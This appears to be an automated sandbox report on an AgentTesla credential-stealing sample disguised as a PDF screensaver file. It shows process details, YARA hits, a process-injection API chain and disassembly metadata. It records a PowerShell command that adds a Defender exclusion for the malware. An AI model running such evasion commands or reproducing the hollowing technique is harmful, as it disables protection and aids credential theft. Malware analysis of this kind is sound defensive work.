                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1895&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1492842&cwnd=224&unsent_bytes=0&cid=799422a1c4478dcd&ts=457&x=0"
                                                            2024-11-21 10:51:07 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                            Data Ascii: 8.46.123.75


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:05:51:02
                                                            Start date:21/11/2024
                                                            Path:C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                                                            Imagebase:0x820000
                                                            File size:979'456 bytes
                                                            MD5 hash:56507D8FC1346411ED4FDBECB4589EC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:05:51:03
                                                            Start date:21/11/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                                                            Imagebase:0xec0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:05:51:03
                                                            Start date:21/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:05:51:03
                                                            Start date:21/11/2024
                                                            Path:C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                                                            Imagebase:0xd10000
                                                            File size:979'456 bytes
                                                            MD5 hash:56507D8FC1346411ED4FDBECB4589EC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:8.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:199
                                                              Total number of Limit Nodes:15
                                                              execution_graph 21633 5839fa0 21634 583a12b 21633->21634 21635 5839fc6 21633->21635 21635->21634 21637 5835e40 21635->21637 21638 583a220 PostMessageW 21637->21638 21639 583a28c 21638->21639 21639->21635 21640 115d5f0 DuplicateHandle 21641 115d686 21640->21641 21642 115cfa0 21643 115cfe6 GetCurrentProcess 21642->21643 21645 115d031 21643->21645 21646 115d038 GetCurrentThread 21643->21646 21645->21646 21647 115d075 GetCurrentProcess 21646->21647 21648 115d06e 21646->21648 21649 115d0ab 21647->21649 21648->21647 21650 115d0d3 GetCurrentThreadId 21649->21650 21651 115d104 21650->21651 21652 583821a 21653 5838220 21652->21653 21658 5838d38 21653->21658 21673 5838dae 21653->21673 21689 5838d48 21653->21689 21654 5838275 21660 5838d3c 21658->21660 21659 5838d14 21659->21654 21660->21659 21703 58391b6 21660->21703 21707 5839431 21660->21707 21712 5839343 21660->21712 21716 583962e 21660->21716 21721 5839238 21660->21721 21727 5839458 21660->21727 21732 583949a 21660->21732 21737 58396aa 21660->21737 21742 583974b 21660->21742 21747 58395db 21660->21747 21751 5839256 21660->21751 21661 5838d6a 21661->21654 21675 5838d3c 21673->21675 21677 5838db1 21673->21677 21674 5838d14 21674->21654 21675->21674 21678 5839343 2 API calls 21675->21678 21679 5839431 2 API calls 21675->21679 21680 58391b6 2 API calls 21675->21680 21681 5839256 2 API calls 21675->21681 21682 58395db 2 API calls 21675->21682 21683 583974b 2 API calls 21675->21683 21684 58396aa 2 API calls 21675->21684 21685 583949a 2 API calls 21675->21685 21686 5839458 2 API calls 21675->21686 21687 5839238 2 API calls 21675->21687 21688 583962e 2 API calls 21675->21688 21676 5838d6a 21676->21654 21677->21654 21678->21676 21679->21676 21680->21676 21681->21676 21682->21676 21683->21676 21684->21676 21685->21676 21686->21676 21687->21676 21688->21676 21690 5838d62 21689->21690 21692 5839343 2 API calls 21690->21692 21693 5839431 2 API calls 21690->21693 21694 58391b6 2 API calls 21690->21694 21695 5839256 2 API calls 21690->21695 21696 58395db 2 API calls 21690->21696 21697 583974b 2 API calls 21690->21697 21698 58396aa 2 API calls 21690->21698 21699 583949a 2 API calls 21690->21699 21700 5839458 2 API calls 21690->21700 21701 5839238 2 API calls 21690->21701 21702 583962e 2 API calls 21690->21702 21691 5838d6a 21691->21654 21692->21691 21693->21691 21694->21691 21695->21691 21696->21691 21697->21691 21698->21691 21699->21691 21700->21691 21701->21691 21702->21691 21755 5837a58 21703->21755 21759 5837a4d 21703->21759 21708 5839437 21707->21708 21763 5837580 21708->21763 21767 5837588 21708->21767 21709 583972c 21771 5837630 21712->21771 21775 5837638 21712->21775 21713 5839362 21713->21661 21717 5839634 21716->21717 21718 5839a47 21717->21718 21779 58377d0 21717->21779 21783 58377c8 21717->21783 21722 5839211 21721->21722 21723 5839438 21721->21723 21722->21661 21725 5837580 ResumeThread 21723->21725 21726 5837588 ResumeThread 21723->21726 21724 583972c 21725->21724 21726->21724 21728 583947b 21727->21728 21730 58377d0 WriteProcessMemory 21728->21730 21731 58377c8 WriteProcessMemory 21728->21731 21729 583955d 21729->21661 21730->21729 21731->21729 21733 5839645 21732->21733 21734 5839a47 21733->21734 21735 58377d0 WriteProcessMemory 21733->21735 21736 58377c8 WriteProcessMemory 21733->21736 21735->21733 21736->21733 21738 58396bb 21737->21738 21740 58377d0 WriteProcessMemory 21738->21740 21741 58377c8 WriteProcessMemory 21738->21741 21739 58396e1 21739->21661 21740->21739 21741->21739 21743 583975d 21742->21743 21787 5837710 21743->21787 21791 5837709 21743->21791 21744 5839ab8 21749 5837630 Wow64SetThreadContext 21747->21749 21750 5837638 Wow64SetThreadContext 21747->21750 21748 58395a0 21748->21661 21749->21748 21750->21748 21795 58378c0 21751->21795 21799 58378b8 21751->21799 21752 5839229 21756 5837ae1 21755->21756 21756->21756 21757 5837c46 CreateProcessA 21756->21757 21758 5837ca3 21757->21758 21758->21758 21760 5837ae1 21759->21760 21760->21760 21761 5837c46 CreateProcessA 21760->21761 21762 5837ca3 21761->21762 21764 5837589 ResumeThread 21763->21764 21766 58375f9 21764->21766 21766->21709 21768 58375c8 ResumeThread 21767->21768 21770 58375f9 21768->21770 21770->21709 21772 583762f 21771->21772 21772->21771 21773 583769d Wow64SetThreadContext 21772->21773 21774 58376c5 21773->21774 21774->21713 21776 583767d Wow64SetThreadContext 21775->21776 21778 58376c5 21776->21778 21778->21713 21780 5837818 WriteProcessMemory 21779->21780 21782 583786f 21780->21782 21782->21717 21784 58377d0 WriteProcessMemory 21783->21784 21786 583786f 21784->21786 21786->21717 21788 5837750 VirtualAllocEx 21787->21788 21790 583778d 21788->21790 21790->21744 21792 5837750 VirtualAllocEx 21791->21792 21794 583778d 21792->21794 21794->21744 21796 583790b ReadProcessMemory 21795->21796 21798 583794f 21796->21798 21798->21752 21800 583790b ReadProcessMemory 21799->21800 21802 583794f 21800->21802 21802->21752 21803 1154668 21804 1154672 21803->21804 21808 1154758 21803->21808 21814 1153e34 21804->21814 21806 115468d 21809 115477d 21808->21809 21818 1154858 21809->21818 21822 11549ca 21809->21822 21827 1154868 21809->21827 21810 1154787 21810->21804 21815 1153e3f 21814->21815 21835 1155c24 21815->21835 21817 1156faf 21817->21806 21820 115488f 21818->21820 21819 11549b8 21819->21810 21820->21819 21831 11544b4 21820->21831 21823 11549df 21822->21823 21826 11548d1 21822->21826 21823->21810 21824 11549b8 21824->21810 21825 11544b4 CreateActCtxA 21825->21826 21826->21824 21826->21825 21829 115488f 21827->21829 21828 11549b8 21828->21810 21829->21828 21830 11544b4 CreateActCtxA 21829->21830 21830->21829 21832 11558f8 CreateActCtxA 21831->21832 21834 11559bb 21832->21834 21836 1155c2f 21835->21836 21839 1155c44 21836->21839 21838 1157055 21838->21817 21840 1155c4f 21839->21840 21843 1155c74 21840->21843 21842 115713a 21842->21838 21844 1155c7f 21843->21844 21847 1155ca4 21844->21847 21846 115722d 21846->21842 21848 1155caf 21847->21848 21850 115852b 21848->21850 21853 115abda 21848->21853 21849 1158569 21849->21846 21850->21849 21857 115ccc8 21850->21857 21862 115ac00 21853->21862 21866 115ac10 21853->21866 21854 115abee 21854->21850 21859 115ccf9 21857->21859 21858 115cd1d 21858->21849 21859->21858 21874 115ce77 21859->21874 21878 115ce88 21859->21878 21863 115ac10 21862->21863 21869 115ad08 21863->21869 21864 115ac1f 21864->21854 21868 115ad08 GetModuleHandleW 21866->21868 21867 115ac1f 21867->21854 21868->21867 21870 115ad3c 21869->21870 21871 115ad19 21869->21871 21870->21864 21871->21870 21872 115af40 GetModuleHandleW 21871->21872 21873 115af6d 21872->21873 21873->21864 21876 115ce95 21874->21876 21875 115cecf 21875->21858 21876->21875 21882 115ba40 21876->21882 21880 115ce95 21878->21880 21879 115cecf 21879->21858 21880->21879 21881 115ba40 GetModuleHandleW 21880->21881 21881->21879 21883 115ba4b 21882->21883 21885 115dbe8 21883->21885 21886 115d23c 21883->21886 21885->21885 21887 115d247 21886->21887 21888 1155ca4 GetModuleHandleW 21887->21888 21889 115dc57 21888->21889 21889->21885

                                                              Executed Functions

                                                              Function 0583AE79 Relevance: .4, Instructions: 404COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae7512bc46d80bcefe8a34f107f2ebaf1c820555b464b4755b81c40c75497490
                                                              • Instruction ID: f26a8f17125636be516c50511ff7322464a9d85532267d3597f81d89c8679f14
                                                              • Opcode Fuzzy Hash: ae7512bc46d80bcefe8a34f107f2ebaf1c820555b464b4755b81c40c75497490
                                                              • Instruction Fuzzy Hash: 08E1DC717017048FDB29DB79C460BAEBBFAAF89305F1444A9E856DB290CB35EC01CB91
                                                              Function 0115CF90 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0115D01E
                                                              • GetCurrentThread.KERNEL32 ref: 0115D05B
                                                              • GetCurrentProcess.KERNEL32 ref: 0115D098
                                                              • GetCurrentThreadId.KERNEL32 ref: 0115D0F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: afcf35854b983ff479568423bc3defe331eb9c7c64f2066d15a9046874d5053c
                                                              • Instruction ID: 9fd1795f447deb515a808023d1d3d064708e9513cca98ee41b07b7f06f8f27b3
                                                              • Opcode Fuzzy Hash: afcf35854b983ff479568423bc3defe331eb9c7c64f2066d15a9046874d5053c
                                                              • Instruction Fuzzy Hash: B15176B090134ACFDB58DFA9D948BDEBBF1BF88314F208599E419A72A0D7345844CB26
                                                              Function 0115CFA0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0115D01E
                                                              • GetCurrentThread.KERNEL32 ref: 0115D05B
                                                              • GetCurrentProcess.KERNEL32 ref: 0115D098
                                                              • GetCurrentThreadId.KERNEL32 ref: 0115D0F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 7fd7c5acae3e1fe556d7d37b4ba6ce4dfa01b07dd2d16be922f80b57550b85e0
                                                              • Instruction ID: d7ba63b642a3180c0afe34da9702ecfe71ed28f4c6d10495870ce77fc7a0efb8
                                                              • Opcode Fuzzy Hash: 7fd7c5acae3e1fe556d7d37b4ba6ce4dfa01b07dd2d16be922f80b57550b85e0
                                                              • Instruction Fuzzy Hash: 2E5156B090034ACFDB58DFAAD548BDEBBF1BF88314F208559E419A7360D7345944CB66
                                                              Function 05837A4D Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 45 5837a4d-5837aed 47 5837b26-5837b46 45->47 48 5837aef-5837af9 45->48 55 5837b48-5837b52 47->55 56 5837b7f-5837bae 47->56 48->47 49 5837afb-5837afd 48->49 50 5837b20-5837b23 49->50 51 5837aff-5837b09 49->51 50->47 53 5837b0b 51->53 54 5837b0d-5837b1c 51->54 53->54 54->54 57 5837b1e 54->57 55->56 58 5837b54-5837b56 55->58 62 5837bb0-5837bba 56->62 63 5837be7-5837ca1 CreateProcessA 56->63 57->50 60 5837b79-5837b7c 58->60 61 5837b58-5837b62 58->61 60->56 64 5837b66-5837b75 61->64 65 5837b64 61->65 62->63 66 5837bbc-5837bbe 62->66 76 5837ca3-5837ca9 63->76 77 5837caa-5837d30 63->77 64->64 67 5837b77 64->67 65->64 68 5837be1-5837be4 66->68 69 5837bc0-5837bca 66->69 67->60 68->63 71 5837bce-5837bdd 69->71 72 5837bcc 69->72 71->71 73 5837bdf 71->73 72->71 73->68 76->77 87 5837d32-5837d36 77->87 88 5837d40-5837d44 77->88 87->88 91 5837d38 87->91 89 5837d46-5837d4a 88->89 90 5837d54-5837d58 88->90 89->90 92 5837d4c 89->92 93 5837d5a-5837d5e 90->93 94 5837d68-5837d6c 90->94 91->88 92->90 93->94 95 5837d60 93->95 96 5837d7e-5837d85 94->96 97 5837d6e-5837d74 94->97 95->94 98 5837d87-5837d96 96->98 99 5837d9c 96->99 97->96 98->99 100 5837d9d 99->100 100->100
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05837C8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 58aca948a08b0ead8e5d5e2192544edc58c375c7f70e52d2151c23f098b9edfa
                                                              • Instruction ID: 2b6d9bafb91aff47e7bbde6f5d6cdce03729fbbc8d8286b01e73169c82637e51
                                                              • Opcode Fuzzy Hash: 58aca948a08b0ead8e5d5e2192544edc58c375c7f70e52d2151c23f098b9edfa
                                                              • Instruction Fuzzy Hash: D3A14AB1D00219DFEB10DF68C841BADBBB2FF44314F1485A9E819E7240DB759A85CF91
                                                              Function 05837A58 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 102 5837a58-5837aed 104 5837b26-5837b46 102->104 105 5837aef-5837af9 102->105 112 5837b48-5837b52 104->112 113 5837b7f-5837bae 104->113 105->104 106 5837afb-5837afd 105->106 107 5837b20-5837b23 106->107 108 5837aff-5837b09 106->108 107->104 110 5837b0b 108->110 111 5837b0d-5837b1c 108->111 110->111 111->111 114 5837b1e 111->114 112->113 115 5837b54-5837b56 112->115 119 5837bb0-5837bba 113->119 120 5837be7-5837ca1 CreateProcessA 113->120 114->107 117 5837b79-5837b7c 115->117 118 5837b58-5837b62 115->118 117->113 121 5837b66-5837b75 118->121 122 5837b64 118->122 119->120 123 5837bbc-5837bbe 119->123 133 5837ca3-5837ca9 120->133 134 5837caa-5837d30 120->134 121->121 124 5837b77 121->124 122->121 125 5837be1-5837be4 123->125 126 5837bc0-5837bca 123->126 124->117 125->120 128 5837bce-5837bdd 126->128 129 5837bcc 126->129 128->128 130 5837bdf 128->130 129->128 130->125 133->134 144 5837d32-5837d36 134->144 145 5837d40-5837d44 134->145 144->145 148 5837d38 144->148 146 5837d46-5837d4a 145->146 147 5837d54-5837d58 145->147 146->147 149 5837d4c 146->149 150 5837d5a-5837d5e 147->150 151 5837d68-5837d6c 147->151 148->145 149->147 150->151 152 5837d60 150->152 153 5837d7e-5837d85 151->153 154 5837d6e-5837d74 151->154 152->151 155 5837d87-5837d96 153->155 156 5837d9c 153->156 154->153 155->156 157 5837d9d 156->157 157->157
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05837C8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: c5763f758f0feb1e948fb2fc7485b2f7eecefc387f272670ea0baee5f49d78a1
                                                              • Instruction ID: bfa701259e6b44cc20f2064bb370527e848ab1c3d41be6bedfdbae9857f07ac2
                                                              • Opcode Fuzzy Hash: c5763f758f0feb1e948fb2fc7485b2f7eecefc387f272670ea0baee5f49d78a1
                                                              • Instruction Fuzzy Hash: 59915BB1D00219DFEB14DF69C841BADBBB2FF48314F1485A9D819E7240DB749A85CF91
                                                              Function 0115AD08 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 159 115ad08-115ad17 160 115ad43-115ad47 159->160 161 115ad19-115ad26 call 115a02c 159->161 163 115ad49-115ad53 160->163 164 115ad5b-115ad9c 160->164 167 115ad3c 161->167 168 115ad28 161->168 163->164 170 115ad9e-115ada6 164->170 171 115ada9-115adb7 164->171 167->160 219 115ad2e call 115af90 168->219 220 115ad2e call 115afa0 168->220 170->171 172 115adb9-115adbe 171->172 173 115addb-115addd 171->173 175 115adc0-115adc7 call 115a038 172->175 176 115adc9 172->176 178 115ade0-115ade7 173->178 174 115ad34-115ad36 174->167 177 115ae78-115aef4 174->177 180 115adcb-115add9 175->180 176->180 209 115aef6-115af1e 177->209 210 115af20-115af38 177->210 181 115adf4-115adfb 178->181 182 115ade9-115adf1 178->182 180->178 185 115adfd-115ae05 181->185 186 115ae08-115ae11 call 115a048 181->186 182->181 185->186 190 115ae13-115ae1b 186->190 191 115ae1e-115ae23 186->191 190->191 192 115ae25-115ae2c 191->192 193 115ae41-115ae45 191->193 192->193 195 115ae2e-115ae3e call 115a058 call 115a068 192->195 217 115ae48 call 115b270 193->217 218 115ae48 call 115b2a0 193->218 195->193 198 115ae4b-115ae4e 200 115ae71-115ae77 198->200 201 115ae50-115ae6e 198->201 201->200 209->210 212 115af40-115af6b GetModuleHandleW 210->212 213 115af3a-115af3d 210->213 214 115af74-115af88 212->214 215 115af6d-115af73 212->215 213->212 215->214 217->198 218->198 219->174 220->174
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0115AF5E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 23b46dd02191ea626a14a92bec83c4a25f3fead273f90c084b98e5cd6e629b14
                                                              • Instruction ID: 0810a10b8e2a63901d2a360140fc7c11744f76c89860e71fb24250727bc794e5
                                                              • Opcode Fuzzy Hash: 23b46dd02191ea626a14a92bec83c4a25f3fead273f90c084b98e5cd6e629b14
                                                              • Instruction Fuzzy Hash: C8812770A00B05CFDB68DF29E44075ABBF5FF88304F108A2DD99A9BA50D775E849CB91
                                                              Function 011558EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 221 11558ec-11559b9 CreateActCtxA 223 11559c2-1155a1c 221->223 224 11559bb-11559c1 221->224 231 1155a1e-1155a21 223->231 232 1155a2b-1155a2f 223->232 224->223 231->232 233 1155a31-1155a3d 232->233 234 1155a40 232->234 233->234 236 1155a41 234->236 236->236
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 011559A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 665f3b15562220381e61ce50a6b3c5860b4919f2674fb528c82244d9803a7a6b
                                                              • Instruction ID: 03ce04725c235bcd93a017be5b75468fb42b6a0fcc099bead9f1f032302ae1c6
                                                              • Opcode Fuzzy Hash: 665f3b15562220381e61ce50a6b3c5860b4919f2674fb528c82244d9803a7a6b
                                                              • Instruction Fuzzy Hash: F14113B1C00319CFEB24DFAAC8847DEBBB6BF89704F20816AD419AB251DB755946CF50
                                                              Function 011544B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 237 11544b4-11559b9 CreateActCtxA 240 11559c2-1155a1c 237->240 241 11559bb-11559c1 237->241 248 1155a1e-1155a21 240->248 249 1155a2b-1155a2f 240->249 241->240 248->249 250 1155a31-1155a3d 249->250 251 1155a40 249->251 250->251 253 1155a41 251->253 253->253
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 011559A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 78e82f68c676a6ace8607eec38fd530ed0491d48d46dc52e904d95e1f29f41bb
                                                              • Instruction ID: d2b92670ed13fb5d59b7a435f1fa3a0c8fc0db0026b9875e0a6e3c53ef1bdf09
                                                              • Opcode Fuzzy Hash: 78e82f68c676a6ace8607eec38fd530ed0491d48d46dc52e904d95e1f29f41bb
                                                              • Instruction Fuzzy Hash: 8841F5B0D0071DCFDB68DFAAC84478EBBB6BF88704F208069D419AB251DB756945CF90
                                                              Function 058377C8 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 267 58377c8-583781e 270 5837820-583782c 267->270 271 583782e-583786d WriteProcessMemory 267->271 270->271 273 5837876-58378a6 271->273 274 583786f-5837875 271->274 274->273
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05837860
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 3804150fed0810ef92f07d6e600ca96dd87323d0dacb206171bd691fbb0bcb19
                                                              • Instruction ID: 29facc14817b17202e18680a8d2174b3df40a0f7b63232253ef860f577973599
                                                              • Opcode Fuzzy Hash: 3804150fed0810ef92f07d6e600ca96dd87323d0dacb206171bd691fbb0bcb19
                                                              • Instruction Fuzzy Hash: 4F2157B1D003499FDB10DFAAC881BDEBBF5FF48310F50842AE919A7240C778A944CBA4
                                                              Function 05837630 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 254 5837630-5837634 255 5837636-5837683 254->255 256 583762f 254->256 259 5837693-5837696 255->259 260 5837685-5837691 255->260 256->254 261 583769d-58376c3 Wow64SetThreadContext 259->261 260->259 262 58376c5-58376cb 261->262 263 58376cc-58376fc 261->263 262->263
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058376B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 5c8a6761a56c1648b04cba03d82b174d67f23e096e08be17cd9cc231e5d03652
                                                              • Instruction ID: ccae07ad1c5b7b19ffb6fe32dd2bdf9c6f6f48ab0d8d3618705f62a5d53201a6
                                                              • Opcode Fuzzy Hash: 5c8a6761a56c1648b04cba03d82b174d67f23e096e08be17cd9cc231e5d03652
                                                              • Instruction Fuzzy Hash: 9E217CB19003099FDB10DFAAC9857EEBBF5EF48210F548429D919E7240DB789945CFA0
                                                              Function 0115D5E8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 278 115d5e8-115d5ee 280 115d5f0-115d684 DuplicateHandle 278->280 281 115d686-115d68c 280->281 282 115d68d-115d6aa 280->282 281->282
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0115D677
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
